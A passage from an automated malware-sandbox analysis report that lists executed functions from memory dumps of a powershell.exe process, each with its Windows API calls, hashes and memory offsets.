                                                    • Opcode Fuzzy Hash: 1430b6b6026f2b84a9d4c4680a29351ca61c1879fd6993c47571c8e15eb8eccd
                                                    • Instruction Fuzzy Hash: A511A3715093849FE712CF25DC85B92FFE4DF42320F0980EBED498B292D275A908CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0200A996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 0200A9C8
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: c418d95ca9f4862e2782d706e289e10d76c745866568350f1e14a3c0c774a507
                                                    • Instruction ID: ea0300f271ae077b6ca898c73d73e51778e770adb7ddd885d3cf340fb69cbcbf
                                                    • Opcode Fuzzy Hash: c418d95ca9f4862e2782d706e289e10d76c745866568350f1e14a3c0c774a507
                                                    • Instruction Fuzzy Hash: C501DF71A00740CFFB10DF16D8857A6FBD4DF01320F08C0AADD098B282D375A904DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 029507D7, Relevance: .0, Instructions: 38COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182731902.0000000002950000.00000040.00000040.sdmp, Offset: 02950000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ca07f1014a64c55317e78e3f68f2c26956760c7e8c37993cf9b6110d999c63a5
                                                    • Instruction ID: dce29ace6850f8f7403b43c2de18eb02b897514ce8679e289ca308049b959977
                                                    • Opcode Fuzzy Hash: ca07f1014a64c55317e78e3f68f2c26956760c7e8c37993cf9b6110d999c63a5
                                                    • Instruction Fuzzy Hash: 8FF0F0776047409FD710DF0AEC02896FBE4EBC5B30B18C46FEC498B211D226B605CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 029507E7, Relevance: .0, Instructions: 33COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182731902.0000000002950000.00000040.00000040.sdmp, Offset: 02950000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9a0e85f28104c45708596451c838de169554eed3919157102ea454a9ade8ceba
                                                    • Instruction ID: efb06d50a5fd8628cfa8e0cadb402bdbfa420124d06b52e0ae00a911bf644350
                                                    • Opcode Fuzzy Hash: 9a0e85f28104c45708596451c838de169554eed3919157102ea454a9ade8ceba
                                                    • Instruction Fuzzy Hash: 2BF0A772A093404FD7119F16AD42495FF91DAC2770718C4AFEC49CB612D226A315CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0295081E, Relevance: .0, Instructions: 27COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182731902.0000000002950000.00000040.00000040.sdmp, Offset: 02950000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: db29950a98af509a3f4551d1c5a15918c83a2f4126b6e42a166227d6df5de99e
                                                    • Instruction ID: ec54bb771e3b970450c1dfdfdad9049f930302921fb96ee03cea706772b8114b
                                                    • Opcode Fuzzy Hash: db29950a98af509a3f4551d1c5a15918c83a2f4126b6e42a166227d6df5de99e
                                                    • Instruction Fuzzy Hash: 57E092766047048BD750CF0BEC41452F7D4EB84A30B18C07FEC0D8B700E136B605CAA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 020023F4, Relevance: .0, Instructions: 15COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177634827.0000000002002000.00000040.00000001.sdmp, Offset: 02002000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: aca17c4d5e5a7576858466be16ada4a7f618b7cc254427264e84e52587a09e7c
                                                    • Instruction ID: c24d8a35aa2ac8888db38f82ec7950127b73a2c22e1c566ec4dae7a4c56b28e7
                                                    • Opcode Fuzzy Hash: aca17c4d5e5a7576858466be16ada4a7f618b7cc254427264e84e52587a09e7c
                                                    • Instruction Fuzzy Hash: 30D05E79205B818FF7178A1CC1A8B9537D4AF55B08F4644F9EC40CB6A3C768E5D1E200
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 020023BC, Relevance: .0, Instructions: 14COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177634827.0000000002002000.00000040.00000001.sdmp, Offset: 02002000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e1dbc43a2ea03da8b070fa2f257bec8239748fb5576597d3dbd5203156649b2d
                                                    • Instruction ID: 577702eb4aa2c91d1aa8863d69e47398a037aa65c9152ca0ef3bd779168f7e92
                                                    • Opcode Fuzzy Hash: e1dbc43a2ea03da8b070fa2f257bec8239748fb5576597d3dbd5203156649b2d
                                                    • Instruction Fuzzy Hash: D5D05E343007818FEB16CA1CD1D8F5973E8AF40704F0644E8BC008B2A6C3B4E880D600
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Analysis Process: powershell.exe PID: 2804 Parent PID: 2368 powershell.exeCOMMON

                                                    Executed Functions

                                                    Function 025DACB7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 025DAD37
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    • Opcode ID: 6d229692adee64a39ac13075c0786514de39300d094236301c1279b0abf07575
                                                    • Instruction ID: 79c91da3c9d5f62f00d4bbf011bc43ac6431f8df1008bab0ed73c64843d4c93f
                                                    • Opcode Fuzzy Hash: 6d229692adee64a39ac13075c0786514de39300d094236301c1279b0abf07575
                                                    • Instruction Fuzzy Hash: F2219F765097849FEB228F25DC45B92BFF4EF06310F08849AE9858B563D3719908DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 025DACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 025DAD37
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    • Opcode ID: f8306b7e1a57fae94d5dc4baf1c41f8f93ce3119bfcf58d3a6f58679796bd686
                                                    • Instruction ID: 3b2661cfb417cd35ad2754634787289483ec07cc5700f07bab60f0a376eb9c1f
                                                    • Opcode Fuzzy Hash: f8306b7e1a57fae94d5dc4baf1c41f8f93ce3119bfcf58d3a6f58679796bd686
                                                    • Instruction Fuzzy Hash: 6411A076500704DFEB21DF59D884B96FBE4FF04221F08C86AED4A8B662D731E818DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 025DB2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 025DB329
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    • Opcode ID: 58eb42e3b02d735254f93c74982d625d19ef6871c3f1112043e10c64566f96ee
                                                    • Instruction ID: b9c4af39a75939ba120ad9e6c2ac69a70e07a16e18166698fd6849bdb18b78f0
                                                    • Opcode Fuzzy Hash: 58eb42e3b02d735254f93c74982d625d19ef6871c3f1112043e10c64566f96ee
                                                    • Instruction Fuzzy Hash: 0C11A071508384AFDB228F15DC45F52FFB4EF06224F09C49AEE844B662C275A918DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 025DB2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 025DB329
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    • Opcode ID: 61c001626c88d4fc10696074810388d13dbfe72644ba1298cb87232b5fa501d1
                                                    • Instruction ID: d37a09faf7d3d4029b23dd1a16ab9f53cae4301ce692dd19dc68462a52f65306
                                                    • Opcode Fuzzy Hash: 61c001626c88d4fc10696074810388d13dbfe72644ba1298cb87232b5fa501d1
                                                    • Instruction Fuzzy Hash: 0B018B32410744DFEB308F49D885B65FFA1FF04725F08C49ADE490A612C371A418EB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02820118, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 028201D0
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    • Opcode ID: ad049e29d555383a762168fb5438d705dd8f1f833ea041aee6678288c922a598
                                                    • Instruction ID: 4e4e25f82610553b568808d1274d95b43ba50013dcf204f7f48c2833061c2cca
                                                    • Opcode Fuzzy Hash: ad049e29d555383a762168fb5438d705dd8f1f833ea041aee6678288c922a598
                                                    • Instruction Fuzzy Hash: 97314A7650E3C08FE7138B759C65691BFB4AF13210F0E84DBD884CF1A3D6259849D762
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0282067A, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0282072D
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 896cc87911864afa9af236a7f66edef22d9a5ebaecedc7add9df7ed396df67d2
                                                    • Instruction ID: 33f0e86393dfe42d9ff8d184cfd8aa7c22e2a1279d0f8642238c287202f18d35
                                                    • Opcode Fuzzy Hash: 896cc87911864afa9af236a7f66edef22d9a5ebaecedc7add9df7ed396df67d2
                                                    • Instruction Fuzzy Hash: 75317075505380AFE722CF65CC85F52BFF8EF05210F09849EE988CB292D375A848CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02820D32, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 02820DD6
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    • Opcode ID: 161dc34d88f8955ef46c7e08beb45b122f4e1bf40beba9b8cc76eba192f5881e
                                                    • Instruction ID: 1118580b081f07b22f8f86f854644f642bf6407b2ca9b5120ad71667f1a241d0
                                                    • Opcode Fuzzy Hash: 161dc34d88f8955ef46c7e08beb45b122f4e1bf40beba9b8cc76eba192f5881e
                                                    • Instruction Fuzzy Hash: D031C8B5509380AFE712CB25DC45B96BFE8DF06214F0884AAE948CF293D375A949C772
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 025DBD1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,9A71A1F2,00000000,00000000,00000000,00000000), ref: 025DBDBC
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    • Opcode ID: fa856ac978c82bc280ea78c1c226f8bbb77efae0e54d999b36b6f163140a96a2
                                                    • Instruction ID: fa03c1e0d4050b9cd2fc58a964e7e340f0df9b1256b647f616ef51fbd0bf68a6
                                                    • Opcode Fuzzy Hash: fa856ac978c82bc280ea78c1c226f8bbb77efae0e54d999b36b6f163140a96a2
                                                    • Instruction Fuzzy Hash: A931C372009380AFE722CB60CC45F96BFB8EF06310F0984DBF984CB192D225A948C7B1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 025DAF24, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,9A71A1F2,00000000,00000000,00000000,00000000), ref: 025DAFBE
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    • Opcode ID: bfa0f9e7cb33932a8aa96da985715d36e0a1b735accfc3182e7fffbf7cc67fd2
                                                    • Instruction ID: 24694836149017c088db81212bba0e3876d640d8335e13905a4fe06d5b1b086d
                                                    • Opcode Fuzzy Hash: bfa0f9e7cb33932a8aa96da985715d36e0a1b735accfc3182e7fffbf7cc67fd2
                                                    • Instruction Fuzzy Hash: 5D21E6B2509380AFE712CF24DC45B96BFB8EF06320F0984DBE984DB193D2659949C771
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02820FEE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0282109E
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    • Opcode ID: 358ba33bba85c895ba8691837b2127b933150311ffd69ba1b1301d6e2026acef
                                                    • Instruction ID: 2075d4db78a5de5da38792313437d684bd55ee15c56c2b3b51278523afec1063
                                                    • Opcode Fuzzy Hash: 358ba33bba85c895ba8691837b2127b933150311ffd69ba1b1301d6e2026acef
                                                    • Instruction Fuzzy Hash: A7316F7550E3C06FD3138B358C55B56BFB4AF43610F1A81DBD9848F2A3D629A909C7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 025DB01D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,9A71A1F2,00000000,00000000,00000000,00000000), ref: 025DB0AE
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    • Opcode ID: e26d3916a715d5de74a046ae079a6fd4bc644cbe409ee89702695ad797649bf6
                                                    • Instruction ID: b962309f826071770dd897888405e219169de7f62a6207a3c910b7bc75fe1258
                                                    • Opcode Fuzzy Hash: e26d3916a715d5de74a046ae079a6fd4bc644cbe409ee89702695ad797649bf6
                                                    • Instruction Fuzzy Hash: F921D171509380AFE722CF15CC45FA6BFB8EF06220F0984ABE945CB192D664E908CB71
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 025DA1A8, Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 025DA23E
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleCtrlHandler
                                                    • String ID:
                                                    • API String ID: 1513847179-0
                                                    • Opcode ID: 55697136686344fd7be5d6084080019b221c2fcf57395e92bb416ff61d49870b
                                                    • Instruction ID: 7cb5f1747531d5482e9f31243a6d4697c2bffbb8a85c19a14df3263a4de5ade2
                                                    • Opcode Fuzzy Hash: 55697136686344fd7be5d6084080019b221c2fcf57395e92bb416ff61d49870b
                                                    • Instruction Fuzzy Hash: A121E57150D3C16FD312CB358C55B66BFB4EF43220F0981DBD8848F693D229A919C7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02820784, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,9A71A1F2,00000000,00000000,00000000,00000000), ref: 02820819
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    • Opcode ID: 34f4ff88f12f0debc9dcff6cd485b7e996f5ab2d2519cc283586bfb36320b104
                                                    • Instruction ID: f87f971990ec6322bcb9b4a857172c69e4780c518d947496239a688b257ed267
                                                    • Opcode Fuzzy Hash: 34f4ff88f12f0debc9dcff6cd485b7e996f5ab2d2519cc283586bfb36320b104
                                                    • Instruction Fuzzy Hash: C521C876408784AFE712CB159C45BA3BFA8EF46720F0981DAE9848B193D224A909C771
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02820464, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02820502
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    • Opcode ID: d919b8e55b26b250e2075f610be1954c01510be93bb2103188b474d38dfaa6b2
                                                    • Instruction ID: ef0dbc824e80498ff7f64448924967ae3242ea8ef6708a813d6e294816936ac7
                                                    • Opcode Fuzzy Hash: d919b8e55b26b250e2075f610be1954c01510be93bb2103188b474d38dfaa6b2
                                                    • Instruction Fuzzy Hash: 4D217F7640E3C0AFD3128B358C55B62BFB4EF47610F1A81CBD8848F693D225A919C7B2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028206AE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0282072D
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 3158ed41da011591d97fc5cafc87548bd490dd232b48337797fde6a4efbf2815
                                                    • Instruction ID: 69d2902473f0379fb2dd1a3f3ac0abac1ad52069918950b6288164a1df9cc083
                                                    • Opcode Fuzzy Hash: 3158ed41da011591d97fc5cafc87548bd490dd232b48337797fde6a4efbf2815
                                                    • Instruction Fuzzy Hash: DB219079500704EFE721DF65CC85F66FBE8EF08650F04846AE949CB292D772E948CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02820854, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,9A71A1F2,00000000,00000000,00000000,00000000), ref: 028208E5
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 248388bbb67f76c445b7e88d81327eacc60013ea1eebce6867e3838939ca6c51
                                                    • Instruction ID: 06ee321c0e4b36a69e8de230ceea546d6aee1d6bf2af592611db32c0e16b231c
                                                    • Opcode Fuzzy Hash: 248388bbb67f76c445b7e88d81327eacc60013ea1eebce6867e3838939ca6c51
                                                    • Instruction Fuzzy Hash: B421B276409380AFE722CF10DC45F96FFB8EF06310F09849BE9449B153C225A909CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 025DA8B4, Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 025DA94A
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    • Opcode ID: d1aec5e252a6575e99822c5a33e2823f11a5110fc554ebe61ba0bd5da44c0cf2
                                                    • Instruction ID: 7b8f3b29febc661b7de98a0568a4b390155f9209f4b493b9db04e6588298b84b
                                                    • Opcode Fuzzy Hash: d1aec5e252a6575e99822c5a33e2823f11a5110fc554ebe61ba0bd5da44c0cf2
                                                    • Instruction Fuzzy Hash: AD219575409780AFD3138B259C51B62BFB4EF87610F0981DBE8848B653D225A919C7B2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02820D66, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 02820DD6
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    • Opcode ID: abc3276bedaf5d1205dc175deae155cdc19011a6a665b96dd6fa91546f4a8825
                                                    • Instruction ID: 1da2026cd785b14630d0cfbdb732dd3590c63edd66fae589fcb5bd83e5c87376
                                                    • Opcode Fuzzy Hash: abc3276bedaf5d1205dc175deae155cdc19011a6a665b96dd6fa91546f4a8825
                                                    • Instruction Fuzzy Hash: 7521A179501244AFF720DF25CC85BA6FBE8EF04214F04856AED48DB282D775F948CA61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 025DBD52, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,9A71A1F2,00000000,00000000,00000000,00000000), ref: 025DBDBC
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    • Opcode ID: 5e944d767cc5f379e1874210ee306de57cf2deb6066354926ae86df1baac1d9b
                                                    • Instruction ID: dc3a4519fe90971f6c63abd45e5795e5e9ef35a218944fac7ae4c3974dfb8d09
                                                    • Opcode Fuzzy Hash: 5e944d767cc5f379e1874210ee306de57cf2deb6066354926ae86df1baac1d9b
                                                    • Instruction Fuzzy Hash: FE11C072100304EFEB21DF65CC85FAAFBE8EF04320F04846AF905CA141D630A9448BB5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 025DB04A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,9A71A1F2,00000000,00000000,00000000,00000000), ref: 025DB0AE
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    • Opcode ID: 7ac9e34ff623c216f97642e334f5701c942850d2a113d5f1d31af530b47109b0
                                                    • Instruction ID: efb2ecf43df5059d8cef8482c3015cc2860ae7c90b32cba5976c3875f4592f64
                                                    • Opcode Fuzzy Hash: 7ac9e34ff623c216f97642e334f5701c942850d2a113d5f1d31af530b47109b0
                                                    • Instruction Fuzzy Hash: E9117C75600304EFEB20DF19DC85FAABBE8FF44664F14846AED09CB241D674E9488BA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02820F34, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 02820FB0
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    • Opcode ID: d2842599795eb040d544c79f64c7398b7a78cf6e904c332fd7bc909d64571748
                                                    • Instruction ID: 70571ecc4012064c6406cf9838e2dd61b8b4f9b708b6e1125406f7632f462d35
                                                    • Opcode Fuzzy Hash: d2842599795eb040d544c79f64c7398b7a78cf6e904c332fd7bc909d64571748
                                                    • Instruction Fuzzy Hash: 652179755093C49FDB12CB25CC95B92BFB4AF12224F0984DAE988CF693D2659848CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0282137E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    • Opcode ID: d91863fbbc60b090711b2de68f96a851525ef323f21520b41b65da8987eee7bb
                                                    • Instruction ID: bbfd2a42fddb2bacdf813766bbe23826128bf4b9aab48da376f539e124b45b64
                                                    • Opcode Fuzzy Hash: d91863fbbc60b090711b2de68f96a851525ef323f21520b41b65da8987eee7bb
                                                    • Instruction Fuzzy Hash: BE2192765043809FDB21CF25DC45B96FFF4EF06220F08849AED898B563D235A848DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 025DBABE, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleMode
                                                    • String ID:
                                                    • API String ID: 4145635619-0
                                                    • Opcode ID: 1a34d9d07ebd5001d1e346ea2ae75dc67c2ab8599771d153cb6ac48790568c10
                                                    • Instruction ID: d2b20f9a2e7b383199ca368c58d3ecd6cb02189e35fcb1bdee1e062752522759
                                                    • Opcode Fuzzy Hash: 1a34d9d07ebd5001d1e346ea2ae75dc67c2ab8599771d153cb6ac48790568c10
                                                    • Instruction Fuzzy Hash: 53219F725093C09FEB128B25DC55B92BFF4EF07220F0984DADD858F263D224A948DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 025DAAAB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 025DAB1A
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: ccb048c5ba9f493183e7ed94870d879d8b7bb659e3a0a2691f1ab187b00dd8f3
                                                    • Instruction ID: bed56b3c91a4574d72e4a682046c9162cc513da1a41453206c2ee7508ba568b2
                                                    • Opcode Fuzzy Hash: ccb048c5ba9f493183e7ed94870d879d8b7bb659e3a0a2691f1ab187b00dd8f3
                                                    • Instruction Fuzzy Hash: 582172716053809FE721CF29DC45B53BFE8EF46210F0884AAED49CB252D375E808CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028210D4, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 02821148
                                                    Memory Dump Source
